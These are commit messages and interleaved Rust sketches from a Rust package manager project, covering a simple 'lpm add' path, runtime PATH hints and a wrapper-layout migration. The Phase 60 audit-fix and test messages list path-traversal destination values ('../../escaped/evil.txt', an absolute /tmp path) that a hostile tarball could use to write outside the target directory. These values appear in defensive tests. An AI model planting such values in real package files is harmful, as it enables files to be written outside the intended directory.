  Simple path is download-manager: copy bytes, no auto-install.
- import_rewriter exports a sibling collect_bare_specifiers fn that
  shares an internal SpecifierKind classifier with rewrite_imports
  (anti-drift contract — "bare" means the same thing in both places).
- add.rs surfaces the collected externals as a non-JSON notice and
  as an `external_imports` array in the JSON output.

60.1.5 — Non-interactive simple-path guard
- `lpm_config.is_none() && target_path.is_none() && (yes || json ||
  !is_tty)` errors before the file-copy loop. Heuristically defaulting
  to components/ for arbitrary third-party source under
  --yes/--json/non-TTY is a CI/automation footgun.
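
The guard condition above, written out as a standalone predicate. The function name, parameter names, and error text are hypothetical; only the boolean condition comes from the commit message.

```rust
/// Sketch of the 60.1.5 guard: refuse to guess a destination when nobody
/// is present to confirm it.
pub fn simple_path_guard(
    has_lpm_config: bool,
    has_target_path: bool,
    yes: bool,
    json: bool,
    is_tty: bool,
) -> Result<(), String> {
    let non_interactive = yes || json || !is_tty;
    if !has_lpm_config && !has_target_path && non_interactive {
        // Hypothetical wording; the real message is not shown in this log.
        return Err("pass --path when adding a package without lpm.config.json non-interactively".to_string());
    }
    Ok(())
}
```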

Tests
- 15 unit tests in add.rs (resolve_add_target classification including
  the dotted-name regression; resolve_safe_dest contracts including
  symlink-refusal on Unix).
- 10 unit tests in import_rewriter.rs (classify_specifier,
  collect_bare_specifiers).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 60.3: integration tests for lpm add simple path + guards + traversal

Three new wiremock-driven integration test files cover the highest-value
end-to-end scenarios for Phase 60:

- add_simple_non_interactive_without_path.rs (4 sub-tests) — proves
  the 60.1.5 guard fires for --yes, --json, and non-TTY (stdin from
  /dev/null) without --path; positive control with --path succeeds.
  No package.json mutation in any failure case.

- add_source_npm_simple.rs (2 sub-tests) — full simple-path pipeline
  via wiremock npm metadata + tarball: AddTarget::Npm resolves, file-
  spool download, extract, files copied flat (no auto-nest), bare-
  imports notice lists react + @radix-ui/react-slot, package.json
  NOT mutated, .lpm/skills/ NOT created. JSON sub-test asserts the
  package.name uses the npm-style identity (not @lpm.dev/-prefixed)
  and the new external_imports array is well-shaped.

- add_path_traversal_dest_escape.rs — proves resolve_safe_dest is
  wired into the actual write loop, not just unit-tested in
  isolation. Tarball ships an lpm.config.json with files[0].dest =
  "../../escaped/evil.txt" — assertion: containment-violation error,
  exit non-zero, no file written outside target_dir.

Other 60.3 specced tests are either (i) covered by the unit tests
that landed alongside the implementation (#5 dotted-name, #9 version-
spec, #11 symlink — see preplan v6 audit checklist) or (ii)
deliberately deferred where the underlying machinery is already
test-covered by Phase 58.x install tests (#1 lpm.dev rich, #2 npm
rich, #6 npmrc auth, #7 strict-ssl, #8 missing-var fatal).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 60.4: README — lpm add now works against any registry

- Update the lpm add one-liner in the Commands list.
- Add a "How lpm add Works" section explaining: source delivery vs.
  install, the firm naming rule (@lpm.dev/owner.name only), the rich
  vs. simple paths, and the non-interactive --path requirement.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* phase-60 audit fix: resolve_safe_dest must validate before mkdir

Audit reproduced (with a temp-dir filesystem probe) that the landed
resolve_safe_dest helper still created directories OUTSIDE the
target_dir for two attack vectors before the containment error fired:

1. `dest_rel = "../../escaped/evil.txt"` — `Path::join` resolves
   lexically; `dest.parent()` lands outside target; `create_dir_all`
   ran before the containment check, leaving `<target>/../escaped/`
   on disk even though the file write was correctly blocked.

2. Absolute `dest_rel = "/tmp/elsewhere/evil.txt"` — `Path::join` of
   an absolute path returns the absolute path verbatim; `parent =
   /tmp/elsewhere/`; `create_dir_all` created it before the
   containment check fired.

The original integration test only asserted no escaped FILE existed,
so the directory-side-effect bug passed CI.

Fix
- Reorder resolve_safe_dest so EVERY check that can reject the
  destination runs BEFORE any filesystem mutation:
  Step 1 (NEW) — reject absolute dest_rel up-front.
  Step 2 (NEW) — reject any ParentDir / RootDir / Prefix component.
  Step 3 — refuse existing-symlink destinations.
  Step 4 (NEW) — pre-mkdir ancestor canonicalization: walk up to the
    longest existing ancestor; canonicalize; require it under
    target_root_canonical (catches symlinked intermediate dirs).
  Step 5 — create_dir_all (NOW safe).
  Step 6 — post-mkdir re-canonicalize as TOCTOU defense-in-depth.

  The lexical bans in Steps 1-2 kill the entire `../escape` and
  absolute-path attack classes before any mkdir runs. The longest-
  existing-ancestor walk in Step 4 covers the symlinked-intermediate
  case (target/foo → /tmp/elsewhere). Step 6 is paranoia.
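
A sketch of the lexical bans in Steps 1-2 only, assuming a helper shaped like the one below. `lexical_dest_check` is a hypothetical name; the symlink refusal, ancestor canonicalization, mkdir, and post-mkdir re-check (Steps 3-6) are deliberately left out.

```rust
use std::path::{Component, Path, PathBuf};

/// Rejects a destination purely from its textual shape, before any
/// filesystem call, so a refused path can never leave directories behind.
pub fn lexical_dest_check(target_root: &Path, dest_rel: &str) -> Result<PathBuf, String> {
    let rel = Path::new(dest_rel);
    // Step 1: absolute paths would make `join` discard the target root.
    if rel.is_absolute() {
        return Err(format!("absolute destination refused: {dest_rel}"));
    }
    // Step 2: any `..`, root, or drive-prefix component is refused, even if
    // the path would lexically resolve back inside the target.
    for component in rel.components() {
        match component {
            Component::Normal(_) | Component::CurDir => {}
            Component::ParentDir | Component::RootDir | Component::Prefix(_) => {
                return Err(format!("destination escapes target: {dest_rel}"));
            }
        }
    }
    Ok(target_root.join(rel))
}
```

Because nothing here touches the disk, the two attack inputs from the audit are rejected before `create_dir_all` could run.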

Tests
- Strengthen unit tests:
  - resolve_safe_dest_dotdot_in_path_rejected_with_no_external_dir_created
    now asserts no escape directory was created.
  - resolve_safe_dest_absolute_dest_rejected_with_no_external_dir_created
    is new — covers the absolute-path attack.
  - resolve_safe_dest_dotdot_in_middle_of_path_also_rejected covers
    `foo/../bar.txt` (lexically resolves back inside but still
    rejected up-front).
- Extend integration test:
  - dest_escape_via_dotdot_is_refused_and_creates_no_external_directory
    now snapshots target_dir entries before the run and asserts no
    unexpected new top-level entries appeared, plus no escape dir.
  - dest_escape_via_absolute_path_is_refused_and_creates_no_external_directory
    is new — covers the absolute-path attack at the integration level.

Net: 4923 → 4926 workspace tests; clippy + fmt clean; all green.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request Apr 30, 2026
…rs/ (Phase 61.1)

The big lever — the isolated linker's per-package wrapper tree moves
out of `node_modules/.lpm/` to `<project>/.lpm/wrappers/`. After the
relayout, `rm -rf node_modules` no longer wipes the entire incremental
linker cache, so the warm-install bench (and the user pattern Phase 57.2
surfaced — wiping node_modules after a teammate's lockfile change)
actually exercises the incremental linker.

Symlink-target shape changes (audit fix #1, v3):
- Phase 3 root symlinks (canonical + aliases) gain one extra `..`
  segment and route through `<project>/.lpm/wrappers/<seg>/...`.
  Centralized in `LayoutPaths::root_symlink_target()` so the depth
  math (link-depth + 1) is computed in one place.
- Phase 3.5 self-references unchanged — they target the project root,
  which doesn't move under Tier 2.
- Phase 2 internal sibling-wrapper symlinks unchanged — both endpoints
  live inside `.lpm/wrappers/` so the relative `../../` shape is
  preserved.

Drive-by audit fixes folded in:
- #3 (bin-shim wrapper segment): `create_bin_links` now uses
  `pkg.wrapper_segment()` instead of hardcoding
  `format!("{safe}@{version}")`. Pre-fix, local-source deps with a
  `bin` field produced shims pointing at non-existent wrapper paths.
- #7 (Windows junction `..` normalization): added a lexical-clean
  helper inside `create_symlink_or_junction`'s Windows arm so the
  `../.lpm/wrappers/...` shape doesn't embed an unresolved `..`
  segment in the path handed to `cmd /c mklink /J`.
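
A sketch of what a lexical-clean helper of the kind mentioned in #7 might look like. `lexical_clean` is a hypothetical name, and the real helper may differ; this version resolves `.` and `..` textually without touching the filesystem.

```rust
use std::path::{Component, Path, PathBuf};

/// Collapses `.` and `..` segments purely lexically (no symlink resolution).
pub fn lexical_clean(path: &Path) -> PathBuf {
    let mut out = PathBuf::new();
    for component in path.components() {
        match component {
            Component::CurDir => {}
            Component::ParentDir => {
                let last_is_normal =
                    matches!(out.components().next_back(), Some(Component::Normal(_)));
                let at_root = matches!(
                    out.components().next_back(),
                    Some(Component::RootDir | Component::Prefix(_))
                );
                if last_is_normal {
                    // `a/b/..` becomes `a`.
                    out.pop();
                } else if !at_root {
                    // Nothing left to pop: keep a leading `..`.
                    out.push("..");
                }
                // At a root, `..` stays at the root and is dropped.
            }
            other => out.push(other.as_os_str()),
        }
    }
    out
}
```

Joining a link's parent directory with a `../.lpm/wrappers/...` target and cleaning the result yields a path with no `..` left in it, which is the shape the junction call needs.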

`cleanup_stale_entries` updates:
- Explicitly creates `node_modules/` (pre-Tier-2 the wrapper-root
  `create_dir_all` covered both via parent recursion; now they're
  disjoint paths).
- Skips dotfile entries (e.g., the new `.version` schema-tag) when
  sweeping stale wrappers.
- Writes `<wrapper-root>/.version` (D6) for forward-compat shape
  detection.

Test fixtures migrated to use `LayoutPaths` so they track production
semantics on any future shape change. 4949 workspace tests pass;
clippy --workspace -D warnings clean; cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request Apr 30, 2026
* feat(lpm-runtime): RuntimeStatus carries resolved managed-runtime bin

`Ready` and `Installed` now carry a `bin_dir: PathBuf` field — the
managed-runtime bin path that `node_bin_dir(&version)` already resolves
inside `ensure_runtime` and would otherwise discard. Downstream callers
(the PATH builder in `lpm-runner/bin_path`) can consume this hint to
skip a redundant `detect_node_version` + `list_installed` pass per
`lpm run` invocation.

For the `Installed` branch, defensively re-stat after install — if the
freshly-installed bin dir vanished mid-call (race / external tampering),
degrade to `NotInstalled` rather than panic.

This is the data-shape change that the rest of Phase 61 Tier 1 builds on.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-runner): 3-state ManagedRuntimeHint + pre-resolved PATH builder

Adds `ManagedRuntimeHint { Bin(PathBuf) | Absent | Unknown }` plus
`build_path_with_bins_pre_resolved(start_dir, hint)`. The existing
public `build_path_with_bins` becomes a thin wrapper that passes
`Unknown` — preserving the silent-detect contract for callers that
don't go through `ensure_runtime` first (rebuild, dlx, hooks,
tools.rs, doctor, orchestrator).

Why three states, not `Option<PathBuf>`:
- `Bin(path)`  — caller resolved the managed runtime: use it directly.
- `Absent`     — caller called `ensure_runtime` and confirmed there
                 is no managed runtime to use. PATH builder skips the
                 silent re-detect entirely (the win on unpinned projects).
- `Unknown`    — caller hasn't checked. Falls back to silent detect
                 (current pre-Phase-61 behavior).

Collapsing `Absent` and `Unknown` into one nullable would force the
silent re-detect on the unpinned-project path — the most common shape.
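
A sketch of how the three states might drive a PATH builder. `build_path_entries` and its `silent_detect` callback are hypothetical simplifications of `build_path_with_bins_pre_resolved`; only the enum shape and the per-state behavior come from the text above.

```rust
use std::path::PathBuf;

#[derive(Debug, Clone, PartialEq, Default)]
pub enum ManagedRuntimeHint {
    /// Caller already resolved the managed runtime bin dir.
    Bin(PathBuf),
    /// Caller checked and there is no managed runtime to use.
    Absent,
    /// Caller has not checked; fall back to silent detection.
    #[default]
    Unknown,
}

/// Returns PATH entries in priority order: project bin, runtime bin (if any),
/// then whatever was inherited from the environment.
pub fn build_path_entries(
    nm_bin: PathBuf,
    hint: &ManagedRuntimeHint,
    inherited: &[PathBuf],
    silent_detect: impl FnOnce() -> Option<PathBuf>,
) -> Vec<PathBuf> {
    let runtime_bin = match hint {
        ManagedRuntimeHint::Bin(path) => Some(path.clone()),
        ManagedRuntimeHint::Absent => None,
        // Only this arm pays for detection.
        ManagedRuntimeHint::Unknown => silent_detect(),
    };
    let mut entries = vec![nm_bin];
    entries.extend(runtime_bin);
    entries.extend(inherited.iter().cloned());
    entries
}
```

With an `Option<PathBuf>` the `Absent` and `Unknown` arms would be the same `None`, and the builder could not tell whether skipping detection is safe.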

Two deterministic unit tests cover the contract: `_uses_hinted_bin`
asserts the produced PATH is exactly [nm_bin, hint_bin, ...inherited]
when `Bin(...)` is supplied (uses a non-existent fake path so any
re-stat would fail-loud); `_absent_skips_runtime` asserts the PATH is
exactly [nm_bin, ...inherited]. Both assert full structure rather than
substring presence/absence so they're robust to whatever managed-
runtime fragments the developer's PATH happens to contain.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(lpm-runner/script): thread bin_hint through script/command entrypoints

Extends every `pub fn run_*` in the script runner with a
`bin_hint: &ManagedRuntimeHint` parameter, routing each internal
PATH-build through `build_path_with_bins_pre_resolved` instead of the
silent-detect wrapper. Nine entrypoints touched:

- run_script, run_script_with_envs, run_script_captured
- run_script_buffered, run_script_prefixed
- run_command, run_command_captured, run_command_buffered,
  run_command_prefixed

No backwards-compatibility shims — per CLAUDE.md "no `// removed`
comments, no shims, no parallel slow-path wrappers." Tests pass
`&ManagedRuntimeHint::Unknown` (imported as `Unknown` at the top of
the test mod for brevity).

Public API surface change is mechanical (one extra parameter); the
sole external consumer is `lpm-cli`, migrated in the next commit.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(lpm-cli): consume bin_hint, collapse cache-config reads, delete dead wrappers

Threads the `ManagedRuntimeHint` from `commands::run::ensure_runtime`
through the script-execution chain so the downstream PATH builder
doesn't redo `detect_node_version` + `list_installed` on every
`lpm run` invocation.

Signature changes:
- `commands::run::ensure_runtime` now returns `ManagedRuntimeHint`
  (`Bin(bin_dir)` for Ready/Installed; `Absent` for NotInstalled and
  NoRequirement).
- `run`, `run_multi`, `run_workspace`, `run_watch`, `exec`,
  `run_tasks_sequential`, `run_tasks_parallel`, `run_task`, and
  `run_task_captured` all gain a `bin_hint` parameter.

Caller migration:
- `main.rs:3102` (watch path) and `main.rs:3527` (External script
  shortcut) capture the hint before calling `run_watch` / `run`.
- `dev.rs` captures `runtime_hint` via the existing `tokio::join!`
  block instead of discarding it; threads to the dev script invocation.
- `migrate.rs::run_verification` resolves the hint once and reuses
  it across the build + test verification scripts.

Caller contract: every callsite of `run` / `run_multi` / `run_watch`
/ `exec` MUST invoke `ensure_runtime` first — that's where the
user-visible "Using node X" notice + auto-install fire. Documented
on `pub async fn run` so future callers don't bypass it accidentally.

Cache-context dedup (Tier 1.4.2):
- `run` reads `lpm.json` once at the top instead of twice (cache-hit
  check + caching-enabled check both used to read).
- Migrates the simple-script path to use the existing
  `try_cache_hit_with_config` and `is_task_cached_with_config`
  helpers — the no-config wrappers were only used by this one
  callsite.

Dead-code removal (CLAUDE.md "no shims"):
- Delete `is_task_cached`, `try_cache_hit`, `try_cache_store_with_output`
  — every other call site already used the `_with_config` variants.
- Delete the `is_task_cached_false_without_lpm_json` test that
  exclusively exercised the deleted wrapper; the equivalent contract
  is exercised by `is_task_cached_with_config_*` tests.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* perf(lpm-cli/run): Tier 1 follow-ups — workspace pin inheritance, parallel Arc reuse, is_meta_task plumbing

Three follow-ups that landed during the M/L review pass on top of the
base hint threading:

L1 — `is_meta_task` no longer reads `package.json` per call.

  Caller (`run_multi`, `run_workspace_package`) extracts `pkg.scripts`
  once and threads it down through `run_tasks_sequential` /
  `run_tasks_parallel` / `is_meta_task`. The dependsOn-but-no-command
  case previously paid one `package.json` read per task in the
  parallel loop; now zero. The `is_meta_task_from_config` alias
  collapses into the single `is_meta_task` since the helper is
  filesystem-free now.

L2 — `run_tasks_parallel` wraps shared per-call state in `Arc`.

  Pre-Tier-1: each spawned thread did a full `clone` of the hint,
  the tasks `HashMap`, the `LpmJsonConfig`, and (post-L1) the
  `pkg_scripts` `HashMap`. Post-Tier-1: each is `Arc::new`'d once
  before the loop, and each thread does a refcount bump. The saving
  per thread is negligible, but it avoids one full copy of every map
  per task on wide parallel levels.

L3 — workspace per-member calls inherit the root hint when the
member has no own pin.

  `run_workspace_package` probes the member dir via
  `lpm_runtime::detect::detect_node_version` (single-dir, no walk).
  If the member has its own .nvmrc / engines / lpm.json runtime,
  pass `Unknown` so the silent detect resolves the member-level
  pin. If not, inherit the root hint. Matches user intuition that
  the workspace-root pin governs the whole workspace (like nvm
  walking parent dirs).

  Small behavior change: a workspace member with NO own Node pin
  now uses the root-resolved managed runtime instead of falling back
  to system Node. Arguably a bug fix — pre-Tier-1 behavior was
  inconsistent (root auto-installed Node 22 but member silently
  ran on whatever `node` happened to be on PATH).
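
The L2 change above follows a common pattern, sketched here with a single shared map. `run_level_parallel` is a hypothetical function, not the real `run_tasks_parallel`; it only shows the wrap-once, clone-the-handle shape.

```rust
use std::collections::HashMap;
use std::sync::Arc;
use std::thread;

/// Spawns one thread per task name; each thread looks up its script in a
/// map that is shared through `Arc` instead of being cloned per thread.
pub fn run_level_parallel(
    task_names: Vec<String>,
    pkg_scripts: HashMap<String, String>,
) -> Vec<Option<String>> {
    // Wrapped once, before the loop.
    let scripts = Arc::new(pkg_scripts);
    let handles: Vec<_> = task_names
        .into_iter()
        .map(|name| {
            // Refcount bump only; the map itself is not copied.
            let scripts = Arc::clone(&scripts);
            thread::spawn(move || scripts.get(&name).cloned())
        })
        .collect();
    handles
        .into_iter()
        .map(|handle| handle.join().expect("task thread panicked"))
        .collect()
}
```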

Plus the M/L review fixes batched in:
- M1: doc note on `pub async fn run` documenting the
  `ensure_runtime`-must-be-called-first contract.
- M2/M3: `bin_path` test assertions tightened to compare the full
  PATH segment list, not substring presence/absence (robust to
  whatever managed-runtime fragments the developer's PATH happens
  to contain).
- Style: `Default for ManagedRuntimeHint` returning `Unknown`; test
  mods import `ManagedRuntimeHint::Unknown` so call sites read
  `&Unknown` instead of `&ManagedRuntimeHint::Unknown`.

Measurement (n=101, time.perf_counter_ns(), M5 Mac, load avg ~3):
- Managed-runtime fixture (.nvmrc + 7 entries): ~150 µs / lpm run.
- No-managed-runtime fixture: ~60 µs / lpm run.
- bench/run.sh script-overhead (1ms resolution, n=21): within noise.

Sub-perceptible at ms resolution; preparatory plumbing for Tier 2
warm-path relayout. See preplan v3 status block for full numbers.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(lpm-linker): introduce LayoutPaths utility (Phase 61.0.5, no behavior change)

Centralizes wrapper / metadata / health-check path construction. Every
production callsite that built `node_modules/.lpm/...` paths inline now
goes through `LayoutPaths::for_project(project_dir).{isolated,hoisted}_*`.

61.0.5 contract: every helper returns the legacy path
(`node_modules/.lpm/`). No observable behavior change. 61.1 will flip
`isolated_*` to `<project>/.lpm/wrappers/...` as a single source-of-truth
edit; consumers migrate transparently.

Production migrations in this commit:
- `lpm-linker::cleanup_stale_entries`: wrapper-root construction
- `lpm-linker::link_one_package`: pkg-entry-dir + .linked marker
- `lpm-linker::link_finalize`: wrapper-root for bin link traversal
- `lpm-linker::link_packages_hoisted`: metadata path + nested-root (via
  `hoisted_*` helpers, intentionally still scoped to `node_modules/`)
- `lpm-cli::commands::rebuild::live_package_dir`: isolated probe

`doctor.rs` predicate is intentionally NOT migrated here — its semantic
change (handling hoisted-no-conflicts via `install_appears_healthy()`)
lands in 61.4.

Adds `crates/lpm-linker/src/layout.rs` with 13 unit tests covering all
helpers including the 5 `InstallHealth` variants and the
`needs_layout_migration` invariant in 61.0.5.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-linker): flip isolated wrapper root to <project>/.lpm/wrappers/ (Phase 61.1)

The big lever — the isolated linker's per-package wrapper tree moves
out of `node_modules/.lpm/` to `<project>/.lpm/wrappers/`. After the
relayout, `rm -rf node_modules` no longer wipes the entire incremental
linker cache, so the warm-install bench (and the user pattern Phase 57.2
surfaced — wiping node_modules after a teammate's lockfile change)
actually exercises the incremental linker.

Symlink-target shape changes (audit fix #1, v3):
- Phase 3 root symlinks (canonical + aliases) gain one extra `..`
  segment and route through `<project>/.lpm/wrappers/<seg>/...`.
  Centralized in `LayoutPaths::root_symlink_target()` so the depth
  math (link-depth + 1) is computed in one place.
- Phase 3.5 self-references unchanged — they target the project root,
  which doesn't move under Tier 2.
- Phase 2 internal sibling-wrapper symlinks unchanged — both endpoints
  live inside `.lpm/wrappers/` so the relative `../../` shape is
  preserved.

Drive-by audit fixes folded in:
- #3 (bin-shim wrapper segment): `create_bin_links` now uses
  `pkg.wrapper_segment()` instead of hardcoding
  `format!("{safe}@{version}")`. Pre-fix, local-source deps with a
  `bin` field produced shims pointing at non-existent wrapper paths.
- #7 (Windows junction `..` normalization): added a lexical-clean
  helper inside `create_symlink_or_junction`'s Windows arm so the
  `../.lpm/wrappers/...` shape doesn't embed an unresolved `..`
  segment in the path handed to `cmd /c mklink /J`.

`cleanup_stale_entries` updates:
- Explicitly creates `node_modules/` (pre-Tier-2 the wrapper-root
  `create_dir_all` covered both via parent recursion; now they're
  disjoint paths).
- Skips dotfile entries (e.g., the new `.version` schema-tag) when
  sweeping stale wrappers.
- Writes `<wrapper-root>/.version` (D6) for forward-compat shape
  detection.

Test fixtures migrated to use `LayoutPaths` so they track production
semantics on any future shape change. 4949 workspace tests pass;
clippy --workspace -D warnings clean; cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-cli): rebuild.rs uses LayoutPaths + closes store-fallback hole (Phase 61.2)

Three things land together because they all touch `prepare_live_package_dir`:

D8a — store-fallback hard-error. Pre-Phase-61 the function returned
`Ok(store_path)` whenever the live probe fell through, letting the
caller chdir into canonical store bytes for a lifecycle script. On
macOS (clonefile, CoW) that was silent corruption on first write; on
Linux (hardlinks) the early `if !live.starts_with(store_root)` branch
skipped detach so the script ran against shared inodes. Either way, a
soundness violation. Post-fix the function returns `Err("...not linked
into project — refusing to run lifecycle script inside the store...")`
so failures are loud, actionable, and never corrupt the store.

Audit fix #4 — wrapper-segment shape. `live_package_dir` now takes a
`wrapper_id: Option<&str>` and computes the wrapper segment via
`LayoutPaths::wrapper_segment(name, version, wrapper_id)`. The same
helper `LinkTarget::wrapper_segment` delegates to (single source of
truth across the linker / rebuild / future doctor code paths). Pre-fix
the inline `format!("{safe}@{version}")` silently missed every
non-Registry source: a Directory / Link / Tarball / Git dep with a
lifecycle script had its wrapper probe fail and fall through to the
store. Post-fix `ScriptablePackage` carries the `wrapper_id` derived
from `lp.source` via `Source::source_id()`.

Audit fix #5 — test inversion. The pre-existing
`prepare_live_package_dir_does_not_detach_when_path_is_under_store_root`
test pinned the silent-fallback contract D8a inverts. Replaced with
`prepare_live_package_dir_errors_when_unlinked` asserting the new
`Err("...not linked into project...")` shape; canary-bytes-intact
assertion preserved.

Adjacent fix in `p6_triage_autoexec_reference.rs`: the test seeded
the store but not the wrapper, relying on the silent-fallback hole to
run lifecycle scripts. Added a `seed_wrapper` helper that materializes
`<project>/.lpm/wrappers/<seg>/node_modules/<name>/` from the store —
mirroring real post-install state. Pre-D8a the same fixture passed by
accident; the new state captures the actual contract.

`LayoutPaths::wrapper_segment` is the new cross-crate helper.
`LinkTarget::wrapper_segment` delegates to it so the two cannot drift.

4949 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-cli): layout-aware install_state + wrapper-layout migration (Phase 61.3)

Two pieces, both load-bearing per the v3 audit fix #2 / D8c:

1. Layout-aware freshness gate. `check_install_state` AND
   `try_mtime_fast_path` now consult
   `LayoutPaths::needs_layout_migration()` and force `up_to_date = false`
   when a populated legacy `node_modules/.lpm/` coexists with an empty
   `<project>/.lpm/wrappers/`. Without this gate, an upgrade-in-place
   user (binary upgraded but `node_modules/` not wiped) hash-matches
   on the install-hash check, the top-of-`main` fast lane
   short-circuits, and the migration code path never runs — they stay
   silently on the legacy layout until something else invalidates the
   hash.

2. Migration code path inside `lpm install`. Right after the fast-exit
   guard returns false, `migrate_legacy_wrapper_layout` checks the
   same predicate and (when true) wipes `node_modules/.lpm/` so the
   subsequent `cleanup_stale_entries` rebuilds at the new wrapper-root
   location. No rename-first attempt — cross-FS rename hazards
   (Linux containers, network FS, EXDEV) outweigh the saved relink
   cost, which Phase 61 makes faster anyway. Best-effort wipe; legacy-
   state quirks don't abort the install.

D9 — migration notice modes. Human-pretty mode prints a one-line
"migrating wrapper layout" notice via `output::info`; JSON / `--quiet`
/ non-TTY remain silent.

Tests added:
- `legacy_layout_present_forces_install_via_full_read` — hash matches
  but migration is owed → `up_to_date = false`.
- `legacy_layout_present_forces_install_via_mtime_fast_path` — same
  but with v2 mtime line; the mtime fast path bails to slow path.
- `empty_legacy_dir_does_not_force_install` — empty `.lpm/` doesn't
  count as legacy.
- `populated_new_layout_does_not_force_install` — both populated →
  migration considered complete; gate stops firing.
- `migrate_legacy_wrapper_layout_wipes_legacy_state` — happy path.
- `migrate_legacy_wrapper_layout_noop_when_not_owed` — no-op
  on a fresh project (doesn't synthesize directories).
- `migrate_legacy_wrapper_layout_noop_when_both_populated` —
  doesn't wipe on a mid-migration mixed state (real convergence
  happens via the next normal install).

4956 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(lpm-cli): doctor + gitignore + sandbox comment refresh (Phase 61.4 + 61.5 + 61.7)

61.4 — `lpm doctor` predicate becomes layout-aware. The legacy
`nm.exists() && nm.join(".lpm").exists()` probe is replaced with
`LayoutPaths::install_appears_healthy()` plus a `needs_layout_migration()`
gate. The doctor now distinguishes:
- Healthy { Isolated } → "exists with .lpm/wrappers store"
- Healthy { Hoisted } → "exists with hoisted layout"
- Healthy { Mixed } → warn + remediation
- NodeModulesPresentButNoStore → warn (existing message preserved)
- NoNodeModules → fail (existing message preserved)
- legacy layout detected (migration owed) → warn pointing the user
  at `lpm install` to converge

The hoisted-no-conflicts case (which the legacy predicate misreported
as "no .lpm store") now correctly classifies as healthy.

61.5 — `ensure_lpm_wrappers_gitignore` runtime helper. Mirrors
`ensure_skills_gitignore` (and the lpm-vault / npmrc siblings):
runtime "ensure once" pattern, idempotent, OpenOptions-append to
narrow the TOCTOU window. Marker is `.lpm/wrappers/`. Wired into the
install entry point alongside `migrate_legacy_wrapper_layout`.
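
A sketch of the "ensure once" pattern described for 61.5, assuming the marker is matched as a whole line. `ensure_wrappers_gitignore` is a hypothetical simplification; the real helper's signature and edge-case handling are not shown in this log.

```rust
use std::fs::{self, OpenOptions};
use std::io::{self, Write};
use std::path::Path;

const MARKER: &str = ".lpm/wrappers/";

/// Appends the marker to `<project>/.gitignore` unless it is already there.
/// Returns Ok(true) when the file was modified.
pub fn ensure_wrappers_gitignore(project_dir: &Path) -> io::Result<bool> {
    let path = project_dir.join(".gitignore");
    let existing = match fs::read_to_string(&path) {
        Ok(contents) => contents,
        Err(e) if e.kind() == io::ErrorKind::NotFound => String::new(),
        Err(e) => return Err(e),
    };
    // Idempotence: a second call finds the marker and does nothing.
    if existing.lines().any(|line| line.trim() == MARKER) {
        return Ok(false);
    }
    // Append mode never truncates, so a concurrent writer's lines survive.
    let mut file = OpenOptions::new().create(true).append(true).open(&path)?;
    if !existing.is_empty() && !existing.ends_with('\n') {
        file.write_all(b"\n")?;
    }
    file.write_all(MARKER.as_bytes())?;
    file.write_all(b"\n")?;
    Ok(true)
}
```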

61.7 — sandbox comment refresh. `landlock_rules.rs` explanatory
comment referenced `{project}/node_modules/.lpm/`; updated to mention
the post-Phase-61.1 `<project>/.lpm/wrappers/` location. The actual
ReadWrite rule at line 103 already grants `<project>/.lpm` so the
post-relayout location was already covered — comment-only change,
no functional impact.

Tests added:
- `ensure_lpm_wrappers_gitignore_appends_entry`
- `ensure_lpm_wrappers_gitignore_no_duplicate`
- `ensure_lpm_wrappers_gitignore_creates_when_no_gitignore`

4959 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean; no fancy-regex.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(lpm-linker): retarget legacy root symlinks + dotfile-aware layout predicates

Two audit fixes (round 2 of Phase 61 review):

CRITICAL — legacy root-symlink retarget. Pre-fix, the 61.3 migration
wiped `node_modules/.lpm/` but never touched root symlinks at
`node_modules/<pkg>` whose targets pointed into the legacy
wrapper-root shape. Phase 3's `if root_link.exists()` guard skipped
recreation, so an upgrade-in-place install left dangling symlinks —
the wrapper tree was wiped, but `node_modules/<pkg>` still pointed at
the old location and stayed broken.

Fix: `cleanup_stale_entries`'s root-symlink sweep gains a second
predicate. Beyond the existing "not in `direct_names`" stale-name
removal, it now ALSO removes any root symlink whose target traverses
a `.lpm/` segment NOT followed by `wrappers/` (legacy shape). Phase 3
recreates with the correct new target. Walks `Path::components()`
so the predicate is robust to path-separator style and to whether
the relative target leads with `.lpm/` (unscoped) or `../.lpm/`
(scoped). Self-refs (target = `..`, no `.lpm`) and workspace-member
symlinks (target outside `.lpm/`) are unaffected.
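
The legacy-shape predicate described above can be sketched as a walk over `Path::components()`. `is_legacy_wrapper_target` is a hypothetical name, and the example targets in the usage note are illustrative, not copied from a real install.

```rust
use std::ffi::OsStr;
use std::path::{Component, Path};

/// True when the symlink target passes through a `.lpm` segment that is NOT
/// immediately followed by `wrappers` (the pre-relayout shape).
pub fn is_legacy_wrapper_target(target: &Path) -> bool {
    let mut components = target.components().peekable();
    while let Some(component) = components.next() {
        if component == Component::Normal(OsStr::new(".lpm")) {
            let next_is_wrappers = matches!(
                components.peek(),
                Some(Component::Normal(segment)) if *segment == OsStr::new("wrappers")
            );
            if !next_is_wrappers {
                return true;
            }
        }
    }
    false
}
```

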